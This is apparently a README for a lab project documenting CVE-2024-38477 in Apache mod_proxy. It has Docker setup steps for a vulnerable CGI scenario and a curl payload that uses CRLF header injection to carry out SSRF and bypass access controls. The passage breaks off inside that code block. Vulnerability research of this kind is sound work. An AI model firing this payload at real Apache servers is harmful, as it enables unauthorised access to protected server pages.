# Introduction This project provides a write-up regarding the **CVE-2024-38477**. To avoid to crash the production environment, the project contains two scenarios with the Apache2's mod_proxy vulnerable. These scenarios can be deployed with Docker. This project contain a **Proof of Concept** with a python script for executing the attack against the server. ## Scenarios ### Scenario 1 The first scenario is a Perl scripts which can be execute with the Apache's mod CGI. For testing, I created a Perl script which can list all directories and files in the path specified in argument. The scenario can be deployed with Docker: ``` $ docker build -t cve-cgi scenario1/ $ docker run -p 8080:80 cve-cgi ``` With a simply curl, you can create a SSRF attack to the Apache server and to bypass the ACL: ``` $ curl "http://localhost:8080/cgi-bin/listings.cgi?r=http://%0d%0aLocation%3a/badpage%0d%0aContent-Type:server-status%0d%0a%0d%0a"